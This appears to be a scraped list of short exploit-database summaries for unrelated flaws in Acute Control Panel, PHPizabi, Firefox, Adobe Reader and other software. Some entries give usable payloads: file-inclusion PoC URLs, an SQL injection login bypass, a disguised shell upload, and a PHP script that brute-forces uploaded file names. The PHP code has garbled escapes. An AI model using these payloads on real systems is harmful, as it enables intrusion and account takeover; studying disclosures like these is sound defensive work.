Acute Control Panel 1.0.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is present in container.php and header.php for Remote File Inclusion and login.php for SQL Injection. The PoC for Remote File Inclusion is http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00 and http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00. The PoC for SQL Injection is Username : admin ' or ' 1=1 and Password : anything or nothing.
Anyone can upload shell php with extension eg: shell.php.jpg. The shell address can be found by right clicking to the pages to find the shell path.
PHPizabi is prone to a vulnerability that lets remote attackers to upload and execute arbitrary script code. The uploaded file is saved into "/system/cache/temp/" directory and the filename has the form xxx_filename.ext, where xxx is a random number between 1 and 999. If directory listing isn't denied the attacker does not need to know the actual filename (this poc works only in this case), otherwise there are various ways to retrieve the filename, e.g. with this script: $chunk = range(1, 999); shuffle($chunk); $packet = "GET {$path}system/cache/temp/%d_filename.ext HTTP/1.0rn"; $packet .= "Host: {$host}rn"; $packet .= "Connection: closernrn"; foreach ($chunk as $num) { $fp = fsockopen($host, 80); fputs($fp, sprintf($packet, $num)); if (strpos(fread($fp, 1024), "200 OK") !== false) { echo "Filename: {$num}_filename.extn"; break; } fclose($fp); }
This exploit is a proof-of-concept (PoC) for a remote memory corruption vulnerability in Firefox. It works on both Windows and Linux systems. The exploit is available in the form of a tar.gz file from the GitLab Exploit Database.
The most of popular Mail Client now exclude Script Code for mail content. It aims to avoid the type of XSS exploitation (For e.g: stolen cookie). IncrediMail also remove Script Code when the user read mail. However, I found the "Reply" and "Forward" function of the mail client has not handled mail content well resulting in XSS vulnerability.
The vulnerability is caused due to an input validation error when processing FTP requests. This can be exploited to read, modify, or delete arbitrary files from the affected system via directory traversal attacks. The vulnerability is also caused due to an error in handling the RETR command. This can be exploited to crash the FTP service by sending the 'RETR' command without sending the 'PORT' command.
The vulnerable file is view.php, which is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious SQL query to the vulnerable file. This can allow the attacker to read arbitrary files on the server.
A stack overflow vulnerability exists in Microsoft GdiPlus.dll when processing EMF files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted EMF file, resulting in the execution of arbitrary code.
This exploit allows attackers to gain remote access to a vulnerable system by exploiting a vulnerability in Adobe Acrobat Reader. The vulnerability is caused due to a boundary error in the handling of JBIG2 streams within the PDF documents. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted PDF file. Successful exploitation allows execution of arbitrary code.
A SQL injection vulnerability exists in the /theme/default/proc.inc.php file of PHPizabi v0.848b C1 HFP1. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an authenticated user. This URL contains a malicious SQL query which can be used to change the username and password of an existing user, grant the attacker admin rights, and execute arbitrary code on the vulnerable system.
Services By CQR